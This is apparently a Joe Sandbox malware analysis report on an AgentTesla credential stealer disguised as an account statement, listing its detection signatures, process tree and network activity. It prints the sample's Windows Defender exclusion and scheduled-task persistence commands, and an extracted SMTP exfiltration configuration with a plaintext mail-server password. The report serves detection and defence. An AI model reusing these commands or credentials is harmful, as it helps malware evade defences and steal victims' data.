Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UPDATED SSTATEMENT OF ACCOUNT.exe

Overview

General Information

Sample name:UPDATED SSTATEMENT OF ACCOUNT.exe
Analysis ID:1428829
MD5:25e87d17f0c864ffdc217d43c82cc36c
SHA1:aecd0ff1a25d22ace6ab1c9650589ca916cabf3f
SHA256:37fda41fdb04917e4c0da2880b51ba07e959d53a31a93a9b47785a5be8807bd7
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UPDATED SSTATEMENT OF ACCOUNT.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe" MD5: 25E87D17F0C864FFDC217D43C82CC36C)
    • powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 3392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • TgfQNrhQjjseHY.exe (PID: 4460 cmdline: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe MD5: 25E87D17F0C864FFDC217D43C82CC36C)
    • schtasks.exe (PID: 7056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 4548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.tabcoeng.com", "Username": "tabco@tabcoeng.com", "Password": "TaSq3365!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x323e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3245b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x324e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32577:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x325e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32653:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x326e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32779:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                8.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  8.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 27 entries

                    Sigma Signatures

                    Networking

                    barindex
                    Sigma detected: MSBuild connects to smtp port
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 135.181.124.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ProcessId: 528, ProcessName: powershell.exe
                    Sigma detected: Silenttrinity Stager Msbuild Activity
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ProcessId: 528, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe, ParentImage: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe, ParentProcessId: 4460, ParentProcessName: TgfQNrhQjjseHY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", ProcessId: 7056, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", ProcessId: 6392, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ProcessId: 528, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", ProcessId: 6392, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.tabcoeng.com", "Username": "tabco@tabcoeng.com", "Password": "TaSq3365!"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeReversingLabs: Detection: 36%
                    Multi AV Scanner detection for submitted file
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeReversingLabs: Detection: 36%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeJoe Sandbox ML: detected
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49720 version: TLS 1.0
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: zzUBZ.pdb source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
                    Source: Binary string: zzUBZ.pdbSHA256 source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 4x nop then jmp 0178D983h0_2_0178D0F4
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeCode function: 4x nop then jmp 023DCE4Bh9_2_023DC5D1

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 135.181.124.14:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 135.181.124.14:587
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49720 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3346859108.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tabcoeng.com
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2178810898.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.drString found in binary or memory: http://tempuri.org/x.xsd?MultiGames.Properties.Resources
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.drString found in binary or memory: https://github.com/zuppao).
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, cPKWk.cs.Net Code: iLhfhcxZ
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, cPKWk.cs.Net Code: iLhfhcxZ

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.5910000.4.raw.unpack, LoginForm.csLarge array initialization: : array initializer size 33603
                    .NET source code contains very large strings
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, Form1.csLong String: Length: 131612
                    Source: TgfQNrhQjjseHY.exe.0.dr, Form1.csLong String: Length: 131612
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_017871900_2_01787190
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_017864E80_2_017864E8
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_017869200_2_01786920
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_017859E00_2_017859E0
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_017888380_2_01788838
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_0178F8E00_2_0178F8E0
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_01786D580_2_01786D58
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_0186DC740_2_0186DC74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01264AC88_2_01264AC8
